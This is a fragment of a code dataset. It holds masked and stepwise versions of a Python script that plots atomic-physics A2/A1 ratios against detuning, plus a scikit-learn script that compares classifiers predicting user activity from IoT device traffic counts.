"step-2": "<mask token>\nrc('font', **{'family': 'serif'})\n<mask token>\nfor i, nafm in enumerate(nafms):\n detuning = 6.44\n a1, a2 = fetchdata.fetch_data_A1A2({'afmsize': nafm, 'ai': 0.0}, 'det',\n datfile)\n sunits = 9 * 6.71e-05 ** 2 / 16 / np.pi ** 2\n a1[:, 1] = sunits * a1[:, 1]\n a1[:, 2] = sunits * a1[:, 2]\n a2[:, 1] = sunits * a2[:, 1]\n a2[:, 2] = sunits * a2[:, 2]\n i % len(nafms)\n ax = plt.subplot(gs[i % rows, i / rows])\n ax.set_title('AFM = %d sites' % nafm)\n a1s = unumpy.uarray(a1[:, 1], a1[:, 2])\n a2s = unumpy.uarray(a2[:, 1], a2[:, 2])\n a2a1 = a2s / a1s\n a2a1_mean = unumpy.nominal_values(a2a1)\n a2a1_std = unumpy.std_devs(a2a1)\n ax.errorbar(a2[:, 0], a2a1_mean, yerr=a2a1_std, capsize=0.0, elinewidth\n =1.0, fmt='.', ecolor='blue', mec='blue', mew=1.0, ms=5.0, marker=\n 'o', mfc='lightblue', label='A2/A1')\n ax.set_ylabel('A2/A1')\n ax.grid()\n ax.set_xlabel('Detuning from state 2 ($\\\\Gamma$)')\n if nafm == 40:\n ax.set_xlim(-10, 10)\nfigure.savefig('a2a1_detuning.png', dpi=140)\n",
"step-3": "<mask token>\nrc('font', **{'family': 'serif'})\ndatfile = 'data001/a2a1_detuning_allelastic.dat'\nnafms = [4, 6, 8, 10, 12, 16, 20, 24, 32, 34, 38, 40]\ncols = 2\nrows = len(nafms) / 2 + len(nafms) % 2\nfigure = plt.figure(figsize=(10.8, 3.6 * rows))\ngs = matplotlib.gridspec.GridSpec(rows, cols, wspace=0.6, hspace=0.42)\n<mask token>\nfor i, nafm in enumerate(nafms):\n detuning = 6.44\n a1, a2 = fetchdata.fetch_data_A1A2({'afmsize': nafm, 'ai': 0.0}, 'det',\n datfile)\n sunits = 9 * 6.71e-05 ** 2 / 16 / np.pi ** 2\n a1[:, 1] = sunits * a1[:, 1]\n a1[:, 2] = sunits * a1[:, 2]\n a2[:, 1] = sunits * a2[:, 1]\n a2[:, 2] = sunits * a2[:, 2]\n i % len(nafms)\n ax = plt.subplot(gs[i % rows, i / rows])\n ax.set_title('AFM = %d sites' % nafm)\n a1s = unumpy.uarray(a1[:, 1], a1[:, 2])\n a2s = unumpy.uarray(a2[:, 1], a2[:, 2])\n a2a1 = a2s / a1s\n a2a1_mean = unumpy.nominal_values(a2a1)\n a2a1_std = unumpy.std_devs(a2a1)\n ax.errorbar(a2[:, 0], a2a1_mean, yerr=a2a1_std, capsize=0.0, elinewidth\n =1.0, fmt='.', ecolor='blue', mec='blue', mew=1.0, ms=5.0, marker=\n 'o', mfc='lightblue', label='A2/A1')\n ax.set_ylabel('A2/A1')\n ax.grid()\n ax.set_xlabel('Detuning from state 2 ($\\\\Gamma$)')\n if nafm == 40:\n ax.set_xlim(-10, 10)\nfigure.savefig('a2a1_detuning.png', dpi=140)\n",
"step-4": "import numpy as np\nfrom scipy import stats\nfrom statarray import statdat\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib import rc\nrc('font', **{'family': 'serif'})\ndatfile = 'data001/a2a1_detuning_allelastic.dat'\nnafms = [4, 6, 8, 10, 12, 16, 20, 24, 32, 34, 38, 40]\ncols = 2\nrows = len(nafms) / 2 + len(nafms) % 2\nfigure = plt.figure(figsize=(10.8, 3.6 * rows))\ngs = matplotlib.gridspec.GridSpec(rows, cols, wspace=0.6, hspace=0.42)\nimport fetchdata\nfrom uncertainties import unumpy\nfor i, nafm in enumerate(nafms):\n detuning = 6.44\n a1, a2 = fetchdata.fetch_data_A1A2({'afmsize': nafm, 'ai': 0.0}, 'det',\n datfile)\n sunits = 9 * 6.71e-05 ** 2 / 16 / np.pi ** 2\n a1[:, 1] = sunits * a1[:, 1]\n a1[:, 2] = sunits * a1[:, 2]\n a2[:, 1] = sunits * a2[:, 1]\n a2[:, 2] = sunits * a2[:, 2]\n i % len(nafms)\n ax = plt.subplot(gs[i % rows, i / rows])\n ax.set_title('AFM = %d sites' % nafm)\n a1s = unumpy.uarray(a1[:, 1], a1[:, 2])\n a2s = unumpy.uarray(a2[:, 1], a2[:, 2])\n a2a1 = a2s / a1s\n a2a1_mean = unumpy.nominal_values(a2a1)\n a2a1_std = unumpy.std_devs(a2a1)\n ax.errorbar(a2[:, 0], a2a1_mean, yerr=a2a1_std, capsize=0.0, elinewidth\n =1.0, fmt='.', ecolor='blue', mec='blue', mew=1.0, ms=5.0, marker=\n 'o', mfc='lightblue', label='A2/A1')\n ax.set_ylabel('A2/A1')\n ax.grid()\n ax.set_xlabel('Detuning from state 2 ($\\\\Gamma$)')\n if nafm == 40:\n ax.set_xlim(-10, 10)\nfigure.savefig('a2a1_detuning.png', dpi=140)\n",
"step-5": "\nimport numpy as np\nfrom scipy import stats\nfrom statarray import statdat\n\n#a2a1 = np.loadtxt('a2a1_130707_2300.dat')\n#a2a1 = np.concatenate( (a2a1, np.loadtxt('a2a1_130708_1223.dat')), axis=0 )\n\n#a2a1 = np.loadtxt('a2a1_130708_1654.dat')\n#a2a1 = np.loadtxt('a2a1_130709_0030.dat')\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib\n\nfrom matplotlib import rc\nrc('font',**{'family':'serif'})\n\n\n# Data file\ndatfile = 'data001/a2a1_detuning_allelastic.dat' \n\n# Values of nafm for which plots will be shown\nnafms = [4,6,8,10,12,16,20,24,32,34,38,40]\n\ncols = 2\nrows = len(nafms)/2+len(nafms)%2\n\nfigure = plt.figure(figsize=(10.8,3.6*rows))\n#figure.suptitle('Bragg')\ngs = matplotlib.gridspec.GridSpec( rows,cols, wspace=0.6, hspace=0.42) \n\nimport fetchdata\nfrom uncertainties import unumpy\n\nfor i,nafm in enumerate(nafms):\n detuning = 6.44\n a1, a2 = fetchdata.fetch_data_A1A2( {'afmsize':nafm, 'ai':0.}, 'det', datfile )\n\n # Put the units in the cross section\n sunits = 9 * (671e-7**2) / 16 / ( np.pi**2)\n a1[:,1] = sunits*a1[:,1]\n a1[:,2] = sunits*a1[:,2]\n a2[:,1] = sunits*a2[:,1]\n a2[:,2] = sunits*a2[:,2]\n \n i % len(nafms) \n ax = plt.subplot( gs[ i%rows, i/rows] )\n ax.set_title('AFM = %d sites' % nafm)\n\n a1s = unumpy.uarray( a1[:,1] , a1[:,2] ) \n a2s = unumpy.uarray( a2[:,1] , a2[:,2] )\n\n a2a1 = a2s/ a1s\n \n a2a1_mean = unumpy.nominal_values( a2a1 )\n a2a1_std = unumpy.std_devs( a2a1)\n \n \n #ax.errorbar( a1[:,0], a1[:,1], yerr=a1[:,2], \\\n # capsize=0., elinewidth = 1. ,\\\n # fmt='.', ecolor='red', mec='red', \\\n # mew=1., ms=5.,\\\n # marker='o', mfc='pink', \\\n # label=\"A1\") \n\n #ax.errorbar( a2[:,0], a2[:,1], yerr=a2[:,2], \\\n # capsize=0., elinewidth = 1. ,\\\n # fmt='.', ecolor='green', mec='green', \\\n # mew=1., ms=5.,\\\n # marker='o', mfc='limegreen', \\\n # label=\"A2\") \n\n #ax2 = ax.twinx() \n ax.errorbar( a2[:,0], a2a1_mean , yerr=a2a1_std, \\\n capsize=0., elinewidth = 1. 
,\\\n fmt='.', ecolor='blue', mec='blue', \\\n mew=1., ms=5.,\\\n marker='o', mfc='lightblue', \\\n label=\"A2/A1\") \n #ax2.set_ylabel('A2/A1') \n ax.set_ylabel('A2/A1') \n\n ax.grid()\n ax.set_xlabel('Detuning from state 2 ($\\Gamma$)')\n #ax.set_ylabel('Cross section (cm$^{2}$)')\n\n if nafm == 40:\n ax.set_xlim(-10,10)\n\n#plt.show()\nfigure.savefig('a2a1_detuning.png', dpi=140)\n#pylab.clf()\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import glob
import csv
import math
import pandas
# this is used to train the model, try different model, generate the csv file of the result
import pandas
import pandas as pd
import pickle
from sklearn.linear_model import LogisticRegression
from sklearn import metrics
from sklearn import datasets
from sklearn.preprocessing import StandardScaler
import numpy as np
from sklearn.metrics import classification_report, confusion_matrix
import csv
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.linear_model import RidgeClassifierCV
import attr
# from pycm import *
from sklearn.metrics import f1_score
from sklearn.metrics import matthews_corrcoef
from sklearn.metrics import cohen_kappa_score
from sklearn import tree
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.ensemble import RandomForestClassifier
import numpy as np
# evaluation_path = '/aul/homes/qli027/projects/RNN/evaluation/random/'
# # activity = ['work','go_back_home','baby_present','entertainment','smoke','alexa','others','print','check_body_condition']
# for i in range (0,9):
# with open(evaluation_path + str(i) +'.csv', 'w') as new:
# realnames = ['model','TP','FN','TN','FP']
# writer = csv.DictWriter(new, fieldnames = realnames)
# writer.writeheader()
# new.close()
def naiveBayes(X_train, y_train):
    """Train a Gaussian Naive Bayes classifier and return the fitted model."""
    return GaussianNB().fit(X_train, y_train)
def knn(X_train, y_train):
    """Train a k-nearest-neighbours classifier (sklearn defaults) and return it."""
    return KNeighborsClassifier().fit(X_train, y_train)
def decisionTree(X_train, y_train):
    """Train a decision tree with balanced class weights and return it."""
    return tree.DecisionTreeClassifier(class_weight='balanced').fit(X_train, y_train)
def svm_linear(X_train, y_train):
model = SVC(kernel='linear', class_weight='balanced')
model = model.fit(X_train, y_train)
return (model)
def svm_2(X_train, y_train):
model = SVC(kernel='poly', class_weight='balanced', degree=2, random_state=0)
model = model.fit(X_train, y_train)
return (model)
def svm_3(X_train, y_train):
model = SVC(kernel='poly', class_weight='balanced', degree=3, random_state=0)
model = model.fit(X_train, y_train)
return (model)
def svm_4(X_train, y_train):
model = SVC(kernel='poly', class_weight='balanced', degree=4, random_state=0)
model = model.fit(X_train, y_train)
return (model)
def svm_5(X_train, y_train):
model = SVC(kernel='poly', class_weight='balanced', degree=5, random_state=0)
model = model.fit(X_train, y_train)
return (model)
def svm_6(X_train, y_train):
model = SVC(kernel='poly', class_weight='balanced', degree=6, random_state=0)
model = model.fit(X_train, y_train)
return (model)
def svm_7(X_train, y_train):
model = SVC(kernel='poly', class_weight='balanced', degree=7, random_state=0)
model = model.fit(X_train, y_train)
return (model)
def svm_8(X_train, y_train):
model = SVC(kernel='poly', class_weight='balanced', degree=8, random_state=0)
model = model.fit(X_train, y_train)
return (model)
def logisticRegression(X_train, y_train):
model = LogisticRegression(class_weight='balanced')
model = model.fit(X_train, y_train)
return (model)
def passiveAggressiveClassifier(X_train, y_train):
model = PassiveAggressiveClassifier(max_iter=1000, random_state=0, tol=1e-3, class_weight='balanced')
model = model.fit(X_train, y_train)
return (model)
def svm_rbf(X_train, y_train):
model = SVC(kernel='rbf', class_weight='balanced')
model = model.fit(X_train, y_train)
return (model)
def random_forest(X_train, y_train):
model = RandomForestClassifier(n_estimators=100, max_depth=2, random_state=0, class_weight='balanced')
model = model.fit(X_train, y_train)
return (model)
def ridgeClassifierCV(X_train, y_train):
model = RidgeClassifierCV(alphas=[1e-3, 1e-2, 1e-1, 1], class_weight='balanced')
model = model.fit(X_train, y_train)
return (model)
def evaluation_result(y_test, y_pred, model):
cnf_matrix = confusion_matrix(y_test, y_pred, labels=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])
print(cnf_matrix)
FP = cnf_matrix.sum(axis=0) - np.diag(cnf_matrix)
FN = cnf_matrix.sum(axis=1) - np.diag(cnf_matrix)
TP = np.diag(cnf_matrix)
TN = cnf_matrix.sum() - (FP + FN + TP)
FP = FP.astype(int)
FN = FN.astype(int)
TP = TP.astype(int)
TN = TN.astype(int)
print(TP, TN, FP, FN)
evaluation_path = 'C:/penv/unsw/csvfiles/labeled/count/useractivity/evaluation/'
for i in range(0, 13):
with open(evaluation_path + str(i) + '.csv', 'a') as csvfile:
writer = csv.writer(csvfile)
writer.writerow([model, TP[i], FN[i], TN[i], FP[i]])
csvfile.close()
#
data = pd.read_csv("C:/penv/unsw/csvfiles/labeled/count/useractivity/new.csv")
data = data.dropna()
feature_cols = ['Size', 'Amazon Echo', 'Belkin Motion',
'Belkin Switch', 'Blipcare BloodPressure Meter', 'HP Printer', 'Dropcam', 'Insteon Camera',
'LIFX Smart Bulb', 'NEST Smoke Alarm', 'Netatmo Welcome Camera', 'Netatmo Weather Station',
'PIX-STAR Photo-frame', 'Samsung SmartCam', 'Smart Things', 'TP-Link Day Night Cloud camera',
'TP-Link Smart plug', 'Triby Speaker', 'Withings Smart Baby Monitor', 'Withings Smart scale',
'Withings Aura smart sleep sensor', 'iHome Plug', 'Samsung Galaxy Tab', 'Android Phone 1',
'Laptop', 'MacBook', 'Android Phone 2', 'iPhone', 'MacBook/iPhone']
# feature_cols = [ 'Amazon Echo', 'Belkin Motion',
# 'Belkin Switch','Blipcare BloodPressure Meter','HP Printer','Dropcam','Insteon Camera',
# 'LIFX Smart Bulb', 'NEST Smoke Alarm','Netatmo Welcome Camera', 'Netatmo Weather Station',
# 'PIX-STAR Photo-frame','Samsung SmartCam','Smart Things', 'TP-Link Day Night Cloud camera',
# 'TP-Link Smart plug','Triby Speaker','Withings Smart Baby Monitor','Withings Smart scale',
# 'Withings Aura smart sleep sensor','iHome Plug', 'Samsung Galaxy Tab', 'Android Phone 1',
# 'Laptop', 'MacBook', 'Android Phone 2','iPhone','MacBookiPhone']
# feature_cols = ['Size']
X = data[feature_cols]
scaler = StandardScaler()
X = scaler.fit_transform(X) # Features
y = data['User Activity'] # Target variable
# instantiate the model (using the default parameters)
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)
# d = [decisionTree, logisticRegression,knn, svm_linear, svm_2,svm_3,svm_rbf,ridgeClassifierCV,naiveBayes,cnn_3layers,random_forest]
model = decisionTree(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'decisionTree')
model = logisticRegression(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'logisticRegression')
model = knn(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'knn')
model = svm_linear(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'svm_linear')
model = svm_2(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'svm_2')
model = svm_3(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'svm_3')
model = svm_rbf(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'svm_rbf')
model = naiveBayes(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'naiveBayes')
model = random_forest(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'random_forest')
model = ridgeClassifierCV(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'ridgeClassifierCV')
model = passiveAggressiveClassifier(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'passiveAggressiveClassifier')
|
normal
|
{
"blob_id": "a92384a6abee9e231092ee0e4dbdb60bafcc9979",
"index": 8782,
"step-1": "<mask token>\n\n\ndef naiveBayes(X_train, y_train):\n model = GaussianNB()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef knn(X_train, y_train):\n model = KNeighborsClassifier()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef decisionTree(X_train, y_train):\n model = tree.DecisionTreeClassifier(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_linear(X_train, y_train):\n model = SVC(kernel='linear', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\n<mask token>\n\n\ndef svm_3(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=3,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_4(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=4,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_5(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=5,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\n<mask token>\n\n\ndef svm_8(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=8,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef logisticRegression(X_train, y_train):\n model = LogisticRegression(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\n<mask token>\n\n\ndef svm_rbf(X_train, y_train):\n model = SVC(kernel='rbf', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef random_forest(X_train, y_train):\n model = RandomForestClassifier(n_estimators=100, max_depth=2,\n random_state=0, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef ridgeClassifierCV(X_train, y_train):\n model = RidgeClassifierCV(alphas=[0.001, 0.01, 0.1, 1], class_weight=\n 'balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef 
evaluation_result(y_test, y_pred, model):\n cnf_matrix = confusion_matrix(y_test, y_pred, labels=[0, 1, 2, 3, 4, 5,\n 6, 7, 8, 9, 10, 11, 12])\n print(cnf_matrix)\n FP = cnf_matrix.sum(axis=0) - np.diag(cnf_matrix)\n FN = cnf_matrix.sum(axis=1) - np.diag(cnf_matrix)\n TP = np.diag(cnf_matrix)\n TN = cnf_matrix.sum() - (FP + FN + TP)\n FP = FP.astype(int)\n FN = FN.astype(int)\n TP = TP.astype(int)\n TN = TN.astype(int)\n print(TP, TN, FP, FN)\n evaluation_path = (\n 'C:/penv/unsw/csvfiles/labeled/count/useractivity/evaluation/')\n for i in range(0, 13):\n with open(evaluation_path + str(i) + '.csv', 'a') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow([model, TP[i], FN[i], TN[i], FP[i]])\n csvfile.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef naiveBayes(X_train, y_train):\n model = GaussianNB()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef knn(X_train, y_train):\n model = KNeighborsClassifier()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef decisionTree(X_train, y_train):\n model = tree.DecisionTreeClassifier(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_linear(X_train, y_train):\n model = SVC(kernel='linear', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\n<mask token>\n\n\ndef svm_3(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=3,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_4(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=4,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_5(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=5,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_6(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=6,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\n<mask token>\n\n\ndef svm_8(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=8,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef logisticRegression(X_train, y_train):\n model = LogisticRegression(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\n<mask token>\n\n\ndef svm_rbf(X_train, y_train):\n model = SVC(kernel='rbf', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef random_forest(X_train, y_train):\n model = RandomForestClassifier(n_estimators=100, max_depth=2,\n random_state=0, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef ridgeClassifierCV(X_train, 
y_train):\n model = RidgeClassifierCV(alphas=[0.001, 0.01, 0.1, 1], class_weight=\n 'balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef evaluation_result(y_test, y_pred, model):\n cnf_matrix = confusion_matrix(y_test, y_pred, labels=[0, 1, 2, 3, 4, 5,\n 6, 7, 8, 9, 10, 11, 12])\n print(cnf_matrix)\n FP = cnf_matrix.sum(axis=0) - np.diag(cnf_matrix)\n FN = cnf_matrix.sum(axis=1) - np.diag(cnf_matrix)\n TP = np.diag(cnf_matrix)\n TN = cnf_matrix.sum() - (FP + FN + TP)\n FP = FP.astype(int)\n FN = FN.astype(int)\n TP = TP.astype(int)\n TN = TN.astype(int)\n print(TP, TN, FP, FN)\n evaluation_path = (\n 'C:/penv/unsw/csvfiles/labeled/count/useractivity/evaluation/')\n for i in range(0, 13):\n with open(evaluation_path + str(i) + '.csv', 'a') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow([model, TP[i], FN[i], TN[i], FP[i]])\n csvfile.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef naiveBayes(X_train, y_train):\n model = GaussianNB()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef knn(X_train, y_train):\n model = KNeighborsClassifier()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef decisionTree(X_train, y_train):\n model = tree.DecisionTreeClassifier(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_linear(X_train, y_train):\n model = SVC(kernel='linear', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\n<mask token>\n\n\ndef svm_3(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=3,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_4(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=4,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_5(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=5,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_6(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=6,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_7(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=7,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_8(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=8,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef logisticRegression(X_train, y_train):\n model = LogisticRegression(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef passiveAggressiveClassifier(X_train, y_train):\n model = PassiveAggressiveClassifier(max_iter=1000, random_state=0, tol=\n 0.001, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_rbf(X_train, 
y_train):\n model = SVC(kernel='rbf', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef random_forest(X_train, y_train):\n model = RandomForestClassifier(n_estimators=100, max_depth=2,\n random_state=0, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef ridgeClassifierCV(X_train, y_train):\n model = RidgeClassifierCV(alphas=[0.001, 0.01, 0.1, 1], class_weight=\n 'balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef evaluation_result(y_test, y_pred, model):\n cnf_matrix = confusion_matrix(y_test, y_pred, labels=[0, 1, 2, 3, 4, 5,\n 6, 7, 8, 9, 10, 11, 12])\n print(cnf_matrix)\n FP = cnf_matrix.sum(axis=0) - np.diag(cnf_matrix)\n FN = cnf_matrix.sum(axis=1) - np.diag(cnf_matrix)\n TP = np.diag(cnf_matrix)\n TN = cnf_matrix.sum() - (FP + FN + TP)\n FP = FP.astype(int)\n FN = FN.astype(int)\n TP = TP.astype(int)\n TN = TN.astype(int)\n print(TP, TN, FP, FN)\n evaluation_path = (\n 'C:/penv/unsw/csvfiles/labeled/count/useractivity/evaluation/')\n for i in range(0, 13):\n with open(evaluation_path + str(i) + '.csv', 'a') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow([model, TP[i], FN[i], TN[i], FP[i]])\n csvfile.close()\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef naiveBayes(X_train, y_train):\n model = GaussianNB()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef knn(X_train, y_train):\n model = KNeighborsClassifier()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef decisionTree(X_train, y_train):\n model = tree.DecisionTreeClassifier(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_linear(X_train, y_train):\n model = SVC(kernel='linear', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_2(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=2,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_3(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=3,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_4(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=4,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_5(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=5,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_6(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=6,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_7(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=7,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_8(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=8,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef logisticRegression(X_train, y_train):\n model = LogisticRegression(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef passiveAggressiveClassifier(X_train, y_train):\n model = 
PassiveAggressiveClassifier(max_iter=1000, random_state=0, tol=\n 0.001, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_rbf(X_train, y_train):\n model = SVC(kernel='rbf', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef random_forest(X_train, y_train):\n model = RandomForestClassifier(n_estimators=100, max_depth=2,\n random_state=0, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef ridgeClassifierCV(X_train, y_train):\n model = RidgeClassifierCV(alphas=[0.001, 0.01, 0.1, 1], class_weight=\n 'balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef evaluation_result(y_test, y_pred, model):\n cnf_matrix = confusion_matrix(y_test, y_pred, labels=[0, 1, 2, 3, 4, 5,\n 6, 7, 8, 9, 10, 11, 12])\n print(cnf_matrix)\n FP = cnf_matrix.sum(axis=0) - np.diag(cnf_matrix)\n FN = cnf_matrix.sum(axis=1) - np.diag(cnf_matrix)\n TP = np.diag(cnf_matrix)\n TN = cnf_matrix.sum() - (FP + FN + TP)\n FP = FP.astype(int)\n FN = FN.astype(int)\n TP = TP.astype(int)\n TN = TN.astype(int)\n print(TP, TN, FP, FN)\n evaluation_path = (\n 'C:/penv/unsw/csvfiles/labeled/count/useractivity/evaluation/')\n for i in range(0, 13):\n with open(evaluation_path + str(i) + '.csv', 'a') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow([model, TP[i], FN[i], TN[i], FP[i]])\n csvfile.close()\n\n\n<mask token>\n",
"step-5": "import glob\nimport csv\nimport math\n\nimport pandas\n\n# this is used to train the model, try different model, generate the csv file of the result\n\nimport pandas\nimport pandas as pd\nimport pickle\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\nfrom sklearn import datasets\nfrom sklearn.preprocessing import StandardScaler\nimport numpy as np\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport csv\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.linear_model import RidgeClassifierCV\nimport attr\n# from pycm import *\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import matthews_corrcoef\nfrom sklearn.metrics import cohen_kappa_score\nfrom sklearn import tree\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.ensemble import RandomForestClassifier\nimport numpy as np\n\n\n# evaluation_path = '/aul/homes/qli027/projects/RNN/evaluation/random/'\n# # activity = ['work','go_back_home','baby_present','entertainment','smoke','alexa','others','print','check_body_condition']\n# for i in range (0,9):\n# with open(evaluation_path + str(i) +'.csv', 'w') as new:\n# realnames = ['model','TP','FN','TN','FP']\n# writer = csv.DictWriter(new, fieldnames = realnames)\n# writer.writeheader()\n# new.close()\n\n\ndef naiveBayes(X_train, y_train):\n model = GaussianNB()\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef knn(X_train, y_train):\n model = KNeighborsClassifier()\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef decisionTree(X_train, y_train):\n model = tree.DecisionTreeClassifier(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_linear(X_train, y_train):\n model = SVC(kernel='linear', class_weight='balanced')\n model = model.fit(X_train, y_train)\n 
